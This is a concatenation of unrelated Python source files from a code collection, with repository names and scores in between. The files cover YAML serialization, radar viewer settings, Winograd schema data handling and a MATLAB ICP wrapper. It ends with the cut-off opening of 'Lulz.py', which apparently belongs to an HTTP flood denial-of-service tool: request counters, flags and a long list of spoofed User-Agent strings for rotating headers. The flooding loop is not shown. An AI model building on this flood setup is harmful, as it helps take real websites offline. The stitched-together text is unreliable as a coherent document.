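    # Example: an NCHW image (1, 3, 7, 7) with kernel (8, 3, 3, 3),
    # border_mode (1, 1), subsample (2, 2), filter_dilation (1, 1)
    # yields (1, 8, 4, 4).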
return (bsize, nkern) + out_shp | 2.65625 | 3 |
src/my_tools/second_module.py | hyeonukbhin/template_repository | 0 | 12797459 | #!/usr/bin/python3.5
# -*- coding: utf-8 -*-
import os
import sys
EXE_PATH = os.getcwd()  # current working directory
SCRIPT_PATH = os.path.dirname(os.path.abspath(__file__))  # script directory
UPPER_PATH = os.path.dirname(os.path.abspath(os.path.dirname(__file__)))  # parent directory
sys.path.append(UPPER_PATH)  # add the parent directory to sys.path
from my_tools import first_module  # reference a lower-directory module from the upper directory
def function_2():
print("function_2 of second module imported")
def call_function_in_first_module():
print("called from second module to first module")
first_module.function_1()
if __name__ == "__main__":
function_2()
call_function_in_first_module()
| 2.96875 | 3 |
vagga2lithos/lithos.py | tailhook/vagga2lithos | 5 | 12797460 | <gh_stars>1-10
import yaml
try:
from yaml import CSafeDumper as BaseDumper
from yaml import CSafeLoader as BaseLoader
except ImportError:
from yaml import SafeDumper as BaseDumper
from yaml import SafeLoader as BaseLoader
class Dumper(BaseDumper):
def statedir_repr(self, value):
return self.represent_mapping('!Statedir', value.__dict__)
def toplevel_repr(self, value):
return self.represent_mapping('tag:yaml.org,2002:map',
value.format(), flow_style=False)
def list_repr(self, value):
return self.represent_sequence('tag:yaml.org,2002:seq',
value, flow_style=False)
def map_repr(self, value):
return self.represent_mapping('tag:yaml.org,2002:map',
sorted((k, Quoted(v)) for k, v in value.items()),
flow_style=False)
def tag_map_repr(self, value):
return self.represent_mapping('!' + value.__class__.__name__,
value.__dict__)
def quoted_repr(self, value):
return self.represent_scalar('tag:yaml.org,2002:str',
str(value), style='"')
class Loader(BaseLoader):
pass
class Statedir(object):
pass
# Formatting
class List(list): pass
class Map(dict): pass
class Quoted(str): pass
class Toplevel(dict):
def format(self):
x = self.copy()
yield 'kind', x.pop('kind')
yield 'user-id', x.pop('user-id')
yield 'group-id', x.pop('group-id')
yield 'environ', Map(x.pop('environ'))
yield 'memory-limit', x.pop('memory-limit')
yield 'fileno-limit', x.pop('fileno-limit')
yield 'cpu-shares', x.pop('cpu-shares')
yield 'workdir', x.pop('workdir', '/')
yield 'executable', x.pop('executable')
yield 'arguments', List(map(Quoted, x.pop('arguments')))
for k, v in x.items():
yield k, v
yaml.add_representer(Statedir, Dumper.statedir_repr, Dumper=Dumper)
yaml.add_representer(Toplevel, Dumper.toplevel_repr, Dumper=Dumper)
yaml.add_representer(List, Dumper.list_repr, Dumper=Dumper)
yaml.add_representer(Map, Dumper.map_repr, Dumper=Dumper)
yaml.add_representer(Quoted, Dumper.quoted_repr, Dumper=Dumper)
def unknown_type(loader, tag, node):
if isinstance(node, yaml.MappingNode):
typ = type(tag, (object,), {
'__init__': lambda self, **kwargs: self.__dict__.update(kwargs),
'__eq__': lambda self, other: self.__dict__ == other.__dict__,
})
yaml.add_representer(typ, Dumper.tag_map_repr, Dumper=Dumper)
return typ(**loader.construct_mapping(node))
elif isinstance(node, yaml.SequenceNode):
typ = type(tag, (list,), {})
return typ(loader.construct_sequence(node))
elif isinstance(node, yaml.ScalarNode):
typ = type(tag, (str,), {})
return typ(loader.construct_scalar(node))
else:
raise NotImplementedError(node)
yaml.add_multi_constructor("!", unknown_type, Loader=Loader)
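# Round-trip sketch (hedged): an unrecognized tag such as `!Volume {path: /tmp}`
# (hypothetical) loads as a generated `Volume` object, and the representer
# registered above re-emits it as `!Volume` on dump, so unknown tags survive
# a read -> dump cycle unchanged.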
def dump(data, file=None):
return yaml.dump(Toplevel(data), file, Dumper=Dumper)
def read(filename):
with open(str(filename)) as f:
return yaml.load(f, Loader=Loader)
| 2.25 | 2 |
src/vispy_radar_scenes/settings.py | henriksod/vispy_radar_scenes | 2 | 12797461 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
"""Settings dataclass. Holds settings for the visualization tool during runtime.
"""
from dataclasses import dataclass
@dataclass
class Settings:
program_title: str = "Radar Data Viewer"
dark_mode: bool = True
dark_stylesheet: str = ":/dark/stylesheet.qss"
light_stylesheet: str = ":/light/stylesheet.qss"
canvas_light_mode_clear_color: tuple = (0.05, 0.05, 0.08, 1.0)
canvas_dark_mode_clear_color: tuple = (0.05, 0.05, 0.08, 1.0)
grid_circle_color: tuple = (0.15, 0.15, 0.18, 1.0)
doppler_arrow_scale: float = 0.2
draw_doppler_arrows: bool = True
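# Usage sketch (hedged): pick the stylesheet from the flag, e.g.
#   settings = Settings()
#   qss = settings.dark_stylesheet if settings.dark_mode else settings.light_stylesheet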
| 2.125 | 2 |
src/winograd_collection_manipulation/wsc_json_handler.py | gabimelo/portuguese_wsc | 6 | 12797462 | <filename>src/winograd_collection_manipulation/wsc_json_handler.py<gh_stars>1-10
import json
import pandas as pd
from src.helpers.consts import WINOGRAD_SCHEMAS_FILE, WINOGRAD_SCHEMAS_ORIGINAL_FILE
def generate_df_from_original_json():
with open(WINOGRAD_SCHEMAS_ORIGINAL_FILE, 'r', encoding='utf-8') as fp:
wsc_json = json.load(fp)
rows = []
for i in range(0, len(wsc_json), 2):
correct_sentence = wsc_json[i]['substitution'] if wsc_json[i]['correctness'] \
else wsc_json[i+1]['substitution'] # noqa E226
incorrect_sentence = wsc_json[i]['substitution'] if not wsc_json[i]['correctness'] \
else wsc_json[i+1]['substitution'] # noqa E226
correct_sentence = correct_sentence.replace('recieved', 'received')
incorrect_sentence = incorrect_sentence.replace('recieved', 'received')
rows.append([correct_sentence, incorrect_sentence])
df = pd.DataFrame(rows, columns=['correct_sentence', 'incorrect_sentence'])
return df
def generate_df_from_json():
with open(WINOGRAD_SCHEMAS_FILE, 'r', encoding='utf-8') as fp:
wsc_json = json.load(fp)
rows = []
for i in range(len(wsc_json)):
rows.append([wsc_json[i]['correct_sentence'], wsc_json[i]['incorrect_sentence'],
wsc_json[i]['manually_fixed_correct_sentence'],
wsc_json[i]['manually_fixed_incorrect_sentence'],
wsc_json[i]['correct_switched'], wsc_json[i]['incorrect_switched'],
wsc_json[i]['is_switchable'], wsc_json[i]['is_associative'],
wsc_json[i]['translated']])
df = pd.DataFrame(rows, columns=['correct_sentence', 'incorrect_sentence',
'manually_fixed_correct_sentence', 'manually_fixed_incorrect_sentence',
'correct_switched', 'incorrect_switched',
'is_switchable', 'is_associative', 'translated'])
return df
def generate_json(df):
json_rows = []
for index, row in df.iterrows():
dic = {'question_id': index,
'correct_sentence': row.correct_sentence,
'incorrect_sentence': row.incorrect_sentence,
'manually_fixed_correct_sentence': row.manually_fixed_correct_sentence,
'manually_fixed_incorrect_sentence': row.manually_fixed_incorrect_sentence,
'correct_switched': row.manually_fixed_correct_switched,
'incorrect_switched': row.manually_fixed_incorrect_switched}
dic['is_associative'] = False if 'is_associative' not in row else row.is_associative
dic['is_switchable'] = False if 'is_switchable' not in row else row.is_switchable
if dic['is_switchable'] and dic['correct_switched'] == '':
dic['correct_switched'] = row.correct_switched
dic['incorrect_switched'] = row.incorrect_switched
dic['translated'] = row.translated
json_rows.append(dic)
    with open(WINOGRAD_SCHEMAS_FILE, 'w', encoding='utf-8') as outfile:
json.dump(json_rows, outfile, ensure_ascii=False, indent=2)
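# Each record written above has the shape (hedged sketch):
#   {"question_id": 0, "correct_sentence": "...", "incorrect_sentence": "...",
#    "manually_fixed_correct_sentence": "...", "manually_fixed_incorrect_sentence": "...",
#    "correct_switched": "...", "incorrect_switched": "...",
#    "is_associative": false, "is_switchable": false, "translated": true}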
| 2.71875 | 3 |
globmatinterpret.py | DonHaul/MultiCamCalAruco | 1 | 12797463 |
import sys, os
sys.path.append('./libs')
import numpy as np
import scipy.io
from libs import *
import matlab.engine
def CalculateGlobICP(modelpcs):
    # modelpcs: a list of numpy point-cloud arrays
    eng = matlab.engine.start_matlab()
    # cd into the toolbox folder before invoking the wrapper function
    eng.cd("./GlobalProcrustesICP")
    eng.globalProcrustesWrapper(modelpcs, 5, nargout=0)  # send the input to the function
    return RetrieveGlobICPOutput()
def RetrieveGlobICPOutput(outputpath='./GlobalProcrustesICP/globalIcpOut.mat'):
mat = scipy.io.loadmat(outputpath)
print(mat['R'].shape)
#first dimension is number of cameras, second is number of steps
Hs = [[] for i in range(mat['R'].shape[0])]
for i in range(mat['R'].shape[0]):
        # skip the final step because it returns no rotation
for k in range(mat['R'].shape[1]-1):
Hs[i].append(matmanip.Rt2Homo(mat['R'][i,k],np.squeeze(mat['t'][i,k])))
actualHs = [np.eye(4) for i in range(mat['R'].shape[0])]
print(len(actualHs),actualHs[0].shape)
for i in range(mat['R'].shape[0]):
for k in range(mat['R'].shape[1]-1):
actualHs[i] = np.dot(Hs[i][k] , actualHs[i])
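    # Composition sketch (hedged): left-multiplying each step's transform
    # accumulates them, so actualHs[i] = H_{K-1} @ ... @ H_0 maps camera i's
    # original frame into the globally registered frame.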
print(actualHs[0].shape)
registeredModel = []
    #registeredModel[0][x][0] contains the array of points of pointcloud x
for i in range(len(actualHs)):
        registeredModel.append(mat['registeredModel'][0][i][0])
return actualHs,registeredModel | 2.1875 | 2 |
Lulz.py | kami4/Lulz.pl | 0 | 12797464 | <gh_stars>0
import urllib2
import sys
import threading
import random
import re
#global params
url=''
host=''
headers_useragents=[]
headers_referers=[]
request_counter=0
flag=0
safe=0
def inc_counter():
global request_counter
request_counter+=1
def set_flag(val):
global flag
flag=val
def set_safe():
global safe
safe=1
# generates a user agent array
def useragent_list():
global headers_useragents
headers_useragents.append('Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.3 (KHTML, like Gecko) BlackHawk/1.0.195.0 Chrome/127.0.0.1 Safari/62439616.534')
headers_useragents.append('Mozilla/5.0 (Windows; U; Windows NT 6.1; en; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)')
headers_useragents.append('Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)')
headers_useragents.append('Mozilla/5.0 (PlayStation 4 1.52) AppleWebKit/536.26 (KHTML, like Gecko)')
headers_useragents.append('Mozilla/5.0 (Windows NT 6.1; rv:26.0) Gecko/20100101 Firefox/26.0 IceDragon/26.0.0.2')
headers_useragents.append('Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)')
headers_useragents.append('Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)')
headers_useragents.append('Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)')
headers_useragents.append('Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 2.0.50727; InfoPath.2)')
headers_useragents.append('Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)')
headers_useragents.append('Mozilla/4.0 (compatible; MSIE 6.1; Windows XP)')
headers_useragents.append('Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51')
headers_useragents.append('agadine/1.x.x (+http://www.agada.de)')
headers_useragents.append('Agent-SharewarePlazaFileCheckBot/2.0+(+http://www.SharewarePlaza.com)')
headers_useragents.append('AgentName/0.1 libwww-perl/5.48')
headers_useragents.append('AIBOT/2.1 By +(www.21seek.com A Real artificial intelligence search engine China)')
headers_useragents.append('AideRSS/1.0 (aiderss.com)')
headers_useragents.append('aipbot/1.0 (aipbot; http://www.aipbot.com; <EMAIL>)')
headers_useragents.append('aipbot/2-beta (aipbot dev; http://aipbot.com; <EMAIL>)')
headers_useragents.append('Akregator/1.2.9; librss/remnants')
headers_useragents.append('Aladin/3.324')
headers_useragents.append('Alcatel-BG3/1.0 UP.Browser/5.0.3.1.2')
headers_useragents.append('Aleksika Spider/1.0 (+http://www.aleksika.com/)')
headers_useragents.append('AlertInfo 2.0 (Powered by Newsbrain)')
headers_useragents.append('AlkalineBOT/1.3')
headers_useragents.append('AlkalineBOT/1.4 (1.4.0326.0 RTM)')
headers_useragents.append('Allesklar/0.1 libwww-perl/5.46')
headers_useragents.append('Alligator 1.31 (www.nearsoftware.com)')
headers_useragents.append('Allrati/1.1 (+)')
headers_useragents.append('AltaVista Intranet V2.0 AVS EVAL <EMAIL>')
headers_useragents.append('AltaVista Intranet V2.0 Compaq Altavista Eval <EMAIL>')
headers_useragents.append('AltaVista Intranet V2.0 evreka.com <EMAIL>')
headers_useragents.append('AltaVista V2.0B <EMAIL>')
headers_useragents.append('amaya/x.xx libwww/x.x.x')
headers_useragents.append('AmfibiBOT')
headers_useragents.append('Amfibibot/0.06 (Amfibi Web Search; http://www.amfibi.com; <EMAIL>)')
headers_useragents.append('Amfibibot/0.07 (Amfibi Robot; http://www.amfibi.com; <EMAIL>)')
headers_useragents.append('amibot')
headers_useragents.append('Amiga-AWeb/3.4.167SE')
headers_useragents.append('AmigaVoyager/3.4.4 (MorphOS/PPC native)')
headers_useragents.append('AmiTCP Miami (AmigaOS 2.04)')
headers_useragents.append('Amoi 8512/R21.0 NF-Browser/3.3')
headers_useragents.append('amzn_assoc')
headers_useragents.append('AnnoMille spider 0.1 alpha - http://www.annomille.it')
headers_useragents.append('annotate_google; http://ponderer.org/download/annotate_google.user.js')
headers_useragents.append('Anonymized by ProxyOS: http://www.megaproxy.com')
headers_useragents.append('Anonymizer/1.1')
headers_useragents.append('AnswerBus (http://www.answerbus.com/)')
headers_useragents.append('AnswerChase PROve x.0')
headers_useragents.append('AnswerChase x.0')
headers_useragents.append('ANTFresco/x.xx')
headers_useragents.append('antibot-V1.1.5/i586-linux-2.2')
headers_useragents.append('AnzwersCrawl/2.0 (<EMAIL>;Engine)')
headers_useragents.append('Apexoo Spider 1.x')
headers_useragents.append('Aplix HTTP/1.0.1')
headers_useragents.append('Aplix_SANYO_browser/1.x (Japanese)')
headers_useragents.append('Aplix_SEGASATURN_browser/1.x (Japanese)')
headers_useragents.append('Aport')
headers_useragents.append('appie 1.1 (www.walhello.com)')
headers_useragents.append('Apple iPhone v1.1.4 CoreMedia v1.0.0.4A102')
headers_useragents.append('Apple-PubSub/65.1.1')
headers_useragents.append('ArabyBot (compatible; Mozilla/5.0; GoogleBot; FAST Crawler 6.4; http://www.araby.com;)')
headers_useragents.append('ArachBot')
headers_useragents.append('Arachnoidea (<EMAIL>)')
headers_useragents.append('aranhabot')
headers_useragents.append('ArchitextSpider')
headers_useragents.append('archive.org_bot')
headers_useragents.append('Argus/1.1 (Nutch; http://www.simpy.com/bot.html; feedback at simpy dot com)')
headers_useragents.append('Arikus_Spider')
headers_useragents.append('Arquivo-web-crawler (compatible; heritrix/1.12.1 +http://arquivo-web.fccn.pt)')
headers_useragents.append('ASAHA Search Engine Turkey V.001 (http://www.asaha.com/)')
headers_useragents.append('Asahina-Antenna/1.x')
headers_useragents.append('Asahina-Antenna/1.x (libhina.pl/x.x ; libtime.pl/x.x)')
headers_useragents.append('ask.24x.info')
headers_useragents.append('AskAboutOil/0.06-rcp (Nutch; http://www.nutch.org/docs/en/bot.html; nutch-agent@<EMAIL>)')
headers_useragents.append('asked/Nutch-0.8 (web crawler; http://asked.jp; epicurus at gmail dot com)')
headers_useragents.append('ASPSeek/1.2.5')
headers_useragents.append('ASPseek/1.2.9d')
headers_useragents.append('ASPSeek/1.2.x')
headers_useragents.append('ASPSeek/1.2.xa')
headers_useragents.append('ASPseek/1.2.xx')
headers_useragents.append('ASPSeek/1.2.xxpre')
headers_useragents.append('ASSORT/0.10')
headers_useragents.append('asterias/2.0')
headers_useragents.append('AtlocalBot/1.1 +(http://www.atlocal.com/local-web-site-owner.html)')
headers_useragents.append('Atomic_Email_Hunter/4.0')
headers_useragents.append('Atomz/1.0')
headers_useragents.append('atSpider/1.0')
headers_useragents.append('Attentio/Nutch-0.9-dev (Attentios beta blog crawler; www.attentio.com; <EMAIL>)')
headers_useragents.append('AU-MIC/2.0 MMP/2.0')
headers_useragents.append('AUDIOVOX-SMT5600')
headers_useragents.append('augurfind')
headers_useragents.append('augurnfind V-1.x')
headers_useragents.append('autoemailspider')
headers_useragents.append('autohttp')
headers_useragents.append('autowebdir 1.1 (www.autowebdir.com)')
headers_useragents.append('AV Fetch 1.0')
headers_useragents.append('Avant Browser (http://www.avantbrowser.com)')
headers_useragents.append('AVSearch-1.0(<EMAIL>)')
headers_useragents.append('AVSearch-2.0-fusionIdx-14-CompetitorWebSites')
headers_useragents.append('AVSearch-3.0(AltaVista/AVC)')
headers_useragents.append('AWeb')
headers_useragents.append('axadine/ (Axadine Crawler; http://www.axada.de/; )')
headers_useragents.append('AxmoRobot - Crawling your site for better indexing on www.axmo.com search engine.')
headers_useragents.append('Azureus 2.x.x.x')
headers_useragents.append('BabalooSpider/1.3 (BabalooSpider; http://www.babaloo.si; <EMAIL>)')
headers_useragents.append('BaboomBot/1.x.x (+http://www.baboom.us)')
headers_useragents.append('BackStreet Browser 3.x')
headers_useragents.append('BaiduImagespider+(+http://www.baidu.jp/search/s308.html)')
headers_useragents.append('BaiDuSpider')
headers_useragents.append('Baiduspider+(+http://help.baidu.jp/system/05.html)')
headers_useragents.append('Baiduspider+(+http://www.baidu.com/search/spider.htm)')
headers_useragents.append('Baiduspider+(+http://www.baidu.com/search/spider_jp.html)')
headers_useragents.append('Balihoo/Nutch-1.0-dev (Crawler for Balihoo.com search engine - obeys robots.txt and robots meta tags ; http://balihoo.com/index.aspx; robot at balihoo dot com)')
headers_useragents.append('BanBots/1.2 (<EMAIL>)')
headers_useragents.append('Barca/2.0.xxxx')
headers_useragents.append('(DreamPassport/3.0; isao/MyDiGiRabi)')
headers_useragents.append('(Privoxy/1.0)')
headers_useragents.append('*/Nutch-0.9-dev')
headers_useragents.append('+SitiDi.net/SitiDiBot/1.0 (+Have Good Day)')
headers_useragents.append('-DIE-KRAEHE- META-SEARCH-ENGINE/1.1 http://www.die-kraehe.de')
headers_useragents.append('123spider-Bot (Version: 1.02) powered by www.123spider.de')
headers_useragents.append('192.comAgent')
headers_useragents.append('1st ZipCommander (Net) - http://www.zipcommander.com/')
headers_useragents.append('2Bone_LinkChecker/1.0 libwww-perl/5.64')
headers_useragents.append('4anything.com LinkChecker v2.0')
headers_useragents.append('8484 Boston Project v 1.0')
headers_useragents.append(':robot/1.0 (linux) ( admin e-mail: undefined http://www.neofonie.de/loesungen/search/robot.html )')
headers_useragents.append('A-Online Search')
headers_useragents.append('A1 Keyword Research/1.0.2 (+http://www.micro-sys.dk/products/keyword-research/) miggibot/2007.03.27')
headers_useragents.append('A1 Sitemap Generator/1.0 (+http://www.micro-sys.dk/products/sitemap-generator/) miggibot/2006.01.24')
headers_useragents.append('AbachoBOT')
headers_useragents.append('AbachoBOT (Mozilla compatible)')
headers_useragents.append('ABCdatos BotLink/5.xx.xxx#BBL')
headers_useragents.append('Aberja Checkomat Aberja Hybridsuchmaschine (Germany)')
headers_useragents.append('abot/0.1 (abot; http://www.abot.com; <EMAIL>)')
headers_useragents.append('About/0.1libwww-perl/5.47')
headers_useragents.append('Accelatech RSSCrawler/0.4')
headers_useragents.append('accoona Accoona Search robot')
headers_useragents.append('Accoona-AI-Agent/1.1.1 (crawler at accoona dot com)')
headers_useragents.append('Accoona-AI-Agent/1.1.2 (aicrawler at accoonabot dot com)')
headers_useragents.append('Ace Explorer')
headers_useragents.append('Ack (http://www.ackerm.com/)')
headers_useragents.append('AcoiRobot')
headers_useragents.append('Acoon Robot v1.50.001')
headers_useragents.append('Acoon Robot v1.52 (http://www.acoon.de)')
headers_useragents.append('Acoon-Robot 4.0.x.[xx] (http://www.acoon.de)')
headers_useragents.append('Acoon-Robot v3.xx (http://www.acoon.de and http://www.acoon.com)')
headers_useragents.append('Acorn/Nutch-0.9 (Non-Profit Search Engine; acorn.isara.org; acorn at isara dot org)')
headers_useragents.append('ActiveBookmark 1.x')
headers_useragents.append('Activeworlds')
headers_useragents.append('ActiveWorlds/3.xx (xxx)')
headers_useragents.append('Ad Muncher v4.xx.x')
headers_useragents.append('Ad Muncher v4x Build xxxxx')
headers_useragents.append('Adaxas Spider (http://www.adaxas.net/)')
headers_useragents.append('Advanced Browser (http://www.avantbrowser.com)')
headers_useragents.append('AESOP_com_SpiderMan')
headers_useragents.append('Mozilla/5.0 (Linux; U; Android 4.0.3; fr-fr; MIDC41')
headers_useragents.append('Build/IML74K) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30')
headers_useragents.append('Mozilla/5.0 (Linux; U; Android 2.2; fr-fr; Desire_A8181 Build/FRF91)')
headers_useragents.append('App3leWebKit/53.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1')
headers_useragents.append('Mozilla/5.0 (Linux; U; Android 4.0.3; ru-ru; Explay Surfer 7.02 Build/ICS.g12refM703A1HZ1.20121009) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0')
headers_useragents.append(' Mozilla/5.0 (Linux; Android 4.2.1; Nexus 7 Build/JOP40D) AppleWebKit/535.19 (KHTML, like Gecko)')
headers_useragents.append('Chrome/18.0.1025.166 Safari/535.19')
headers_useragents.append('Mozilla/5.0 (Android; Mobile; rv:18.0) Gecko/18.0 Firefox/18.0')
headers_useragents.append(' Mozilla/5.0 (Linux; Android 4.2.1; Nexus 4 Build/JOP40D) AppleWebKit/535.19 (KHTML, like Gecko)')
headers_useragents.append('Mozilla/5.0 (Linux; Android 4.1.1; Nexus 7 Build/JRO03D)')
headers_useragents.append('AppleWebKit/535.19 (KHTML, like Gecko)')
headers_useragents.append('Chrome/18.0.1025.166 Safari/535.19')
headers_useragents.append('Mozilla/5.0 (Linux; Android 4.1.2; GT-I9300 Build/JZO54K)')
headers_useragents.append('AppleWebKit/535.19 (KHTML, like Gecko)')
headers_useragents.append('Chrome/18.0.1025.166 Mobile Safari/535.19')
headers_useragents.append('Mozilla/5.0 (Linux; Android 4.1.1; Nexus 7 Build/JRO03D)')
headers_useragents.append('AppleWebKit/535.19 (KHTML, like Gecko)')
headers_useragents.append('Chrome/18.0.1025.166 Safari/535.19')
headers_useragents.append('Mozilla/5.0 (Linux; U; Android 4.0.2; en-us; Galaxy Nexus Build/ICL53F)')
headers_useragents.append('AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30')
headers_useragents.append('Mozilla/5.0 (Android; Tablet; rv:18.0) Gecko/18.0 Firefox/18.0')
headers_useragents.append('Mozilla/5.0 (Linux; U; Android 4.1.1; en-us; Nexus S Build/JRO03E)')
headers_useragents.append('AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30')
headers_useragents.append('Mozilla/5.0 (Linux; Android 4.2.1; Nexus 10 Build/JOP40D)')
headers_useragents.append('AppleWebKit/535.19 (KHTML, like Gecko)')
headers_useragents.append('Chrome/18.0.1025.166 Safari/535.19')
headers_useragents.append('Mozilla/5.0 (Linux; U; Android 4.1.2; en-gb; GT-I9300 Build/JZO54K)')
headers_useragents.append('AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30')
headers_useragents.append('Mozilla/5.0 (Linux; Android 4.2.1; Galaxy Nexus Build/JOP40D)')
headers_useragents.append('AppleWebKit/535.19 (KHTML, like Gecko)')
headers_useragents.append('Chrome/18.0.1025.166 Mobile Safari/535.19')
headers_useragents.append('Mozilla/5.0 (Linux; U; Android 4.1.2; en-au; GT-N5100 Build/JZO54K)')
headers_useragents.append('CSSCheck/1.2.2')
headers_useragents.append('Cynthia 1.0')
headers_useragents.append('HTMLParser/1.6')
headers_useragents.append('P3P Validator')
headers_useragents.append('W3C_Validator/1.654')
headers_useragents.append('W3C_Validator/1.606')
headers_useragents.append('W3C_Validator/1.591')
headers_useragents.append('W3C_Validator/1.575')
headers_useragents.append('W3C_Validator/1.555')
headers_useragents.append('W3C_Validator/1.432.2.5')
headers_useragents.append('W3C_Validator/1.432.2.22')
headers_useragents.append('W3C_Validator/1.432.2.19')
headers_useragents.append('W3C_Validator/1.432.2.10')
headers_useragents.append('W3C_Validator/1.305.2.12 libwww-perl/5.64')
headers_useragents.append('WDG_Validator/1.6.2')
headers_useragents.append('amaya/11.3.1 libwww/5.4.1')
headers_useragents.append('amaya/11.2 libwww/5.4.0')
headers_useragents.append('amaya/11.1 libwww/5.4.0')
headers_useragents.append('amaya/10.1 libwww/5.4.0')
headers_useragents.append('amaya/10 libwww/5.4.0')
headers_useragents.append('amaya/9.55 libwww/5.4.0')
headers_useragents.append('amaya/9.54 libwww/5.4.0')
headers_useragents.append('amaya/9.52 libwww/5.4.0')
headers_useragents.append('amaya/9.51 libwww/5.4.0')
headers_useragents.append('amaya/8.8.5 libwww/5.4.0')
headers_useragents.append('amaya/11.2 amaya/5.4.0')
headers_useragents.append('amaya/11.1 amaya/5.4.0')
headers_useragents.append('Cocoal.icio.us/1.0 (v43) (Mac OS X; http://www.scifihifi.com/cocoalicious)')
headers_useragents.append('Cocoal.icio.us/1.0 (v40) (Mac OS X; http://www.scifihifi.com/cocoalicious)')
headers_useragents.append('Cocoal.icio.us/1.0 (v38) (Mac OS X; http://www.scifihifi.com/cocoalicious)')
headers_useragents.append('DomainsDB.net MetaCrawler v.0.9.7c (http://domainsdb.net/)')
headers_useragents.append('GSiteCrawler/v1.20 rev. 273 (http://gsitecrawler.com/)')
headers_useragents.append('GSiteCrawler/v1.12 rev. 260 (http://gsitecrawler.com/)')
headers_useragents.append('GSiteCrawler/v1.06 rev. 251 (http://gsitecrawler.com/)')
headers_useragents.append('iTunes/9.1.1')
headers_useragents.append('iTunes/9.0.3 (Macintosh; U; Intel Mac OS X 10_6_2; en-ca)')
headers_useragents.append('iTunes/9.0.3')
headers_useragents.append('iTunes/9.0.2 (Windows; N)')
headers_useragents.append('itunes/9.0.2 (Macintosh; Intel Mac OS X 10.4.11)')
headers_useragents.append('Mozilla/5.0 (Danger hiptop 3.4; U; AvantGo 3.2)')
headers_useragents.append('Mozilla/3.0 (compatible; AvantGo 3.2)')
headers_useragents.append(' Mozilla/5.0 (compatible; AvantGo 3.2;')
headers_useragents.append('ProxiNet; Danger hiptop 1.0)')
headers_useragents.append('DoCoMo/1.0/P502i/c10 (Google CHTML Proxy/1.0)')
headers_useragents.append('DoCoMo/2.0 SH901iC(c100;TB;W24H12)')
headers_useragents.append('DoCoMo/1.0/N503is/c10')
headers_useragents.append('KDDI-KC31 UP.Browser/6.2.0.5 (GUI)')
headers_useragents.append('MMP/2.0')
headers_useragents.append('UP.Browser/3.04-TS14 UP.Link/3.4.4')
headers_useragents.append('Vodafone/1.0/V802SE/SEJ001 Browser/SEMC-Browser/4.1')
headers_useragents.append('J-PHONE/5.0/V801SA/SN123456789012345 SA/0001JP Profile/MIDP-1.0')
headers_useragents.append('Mozilla/3.0(DDIPOCKET;JRC/AH-J3001V,AH-J3002V/1.0/0100/c50)CNF/2.0')
headers_useragents.append('PDXGW/1.0')
headers_useragents.append('ASTEL/1.0/J-0511.00/c10/smel')
headers_useragents.append('Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_3; en-us)')
headers_useragents.append('AppleWebKit/533.16 (KHTML, like Gecko) Version/5.0 Safari/533.16')
headers_useragents.append('Version/4.0 Mobile Safari/533.1')
headers_useragents.append('Mozilla/1.22 (compatible; MSIE 5.01;')
headers_useragents.append('PalmOS 3.0) EudoraWeb 2.1')
headers_useragents.append('Mozilla/4.0 (compatible; MSIE 4.01;')
headers_useragents.append('Windows CE; PPC; 240x320)')
headers_useragents.append('Mozilla/2.0 (compatible; MSIE 3.02;')
headers_useragents.append('Windows CE; PPC; 240x320)')
headers_useragents.append('Mozilla/5.0 (X11; U; Linux armv6l; rv 1.8.1.5pre) Gecko/20070619')
headers_useragents.append('Minimo/0.020')
headers_useragents.append('Mozilla/5.0 (Windows; U; Windows CE 5.1; rv:1.8.1a3) Gecko/20060610')
headers_useragents.append('Minimo/0.016')
headers_useragents.append('OPWV-SDK UP.Browser/7.0.2.3.119 (GUI) MMP/2.0 Push/PO')
headers_useragents.append('UP.Browser/6.1.0.1.140 (Google CHTML Proxy/1.0)')
headers_useragents.append('Mozilla/4.0 (compatible; MSIE 5.0; PalmOS) PLink 2.56b')
headers_useragents.append('Mozilla/5.0 (PDA; NF35WMPRO/1.0; like Gecko) NetFront/3.5')
headers_useragents.append('Mozilla/4.08 (Windows; Mobile Content Viewer/1.0) NetFront/3.2')
headers_useragents.append('Mozilla/4.0 (PS2; PlayStation BB Navigator 1.0) NetFront/3.0')
headers_useragents.append('Mozilla/4.0 (PDA; PalmOS/sony/model crdb/Revision:1.1.36(de)) NetFront/3.0')
headers_useragents.append('Mozilla/4.0 (PDA; PalmOS/sony/model prmr/Revision:1.1.54 (en)) NetFront/3.0')
headers_useragents.append('Mozilla/4.0 (PDA; Windows CE/0.9.3) NetFront/3.0')
headers_useragents.append('Mozilla/4.0 (PDA; Windows CE/1.0.1) NetFront/3.0')
headers_useragents.append('Mozilla/4.0 (PDA; SL-C750/1.0,Embedix/Qtopia/1.3.0) NetFront/3.0 Zaurus C750')
headers_useragents.append('WM5 PIE')
headers_useragents.append('Xiino/1.0.9E [en] (v. 4.1; 153x130; g4)')
headers_useragents.append('Mozilla/5.0 (Linux; U; Android 3.2.1; en-gb; A501 Build/HTK55D)')
headers_useragents.append('Opera/9.80 (Android 3.2.1; Linux; Opera')
headers_useragents.append('Mozilla/5.0 (Linux; U; Android 3.0.1; en-us; A500 Build/HRI66)')
headers_useragents.append('Mozilla/5.0 (X11; Linux x86_64)')
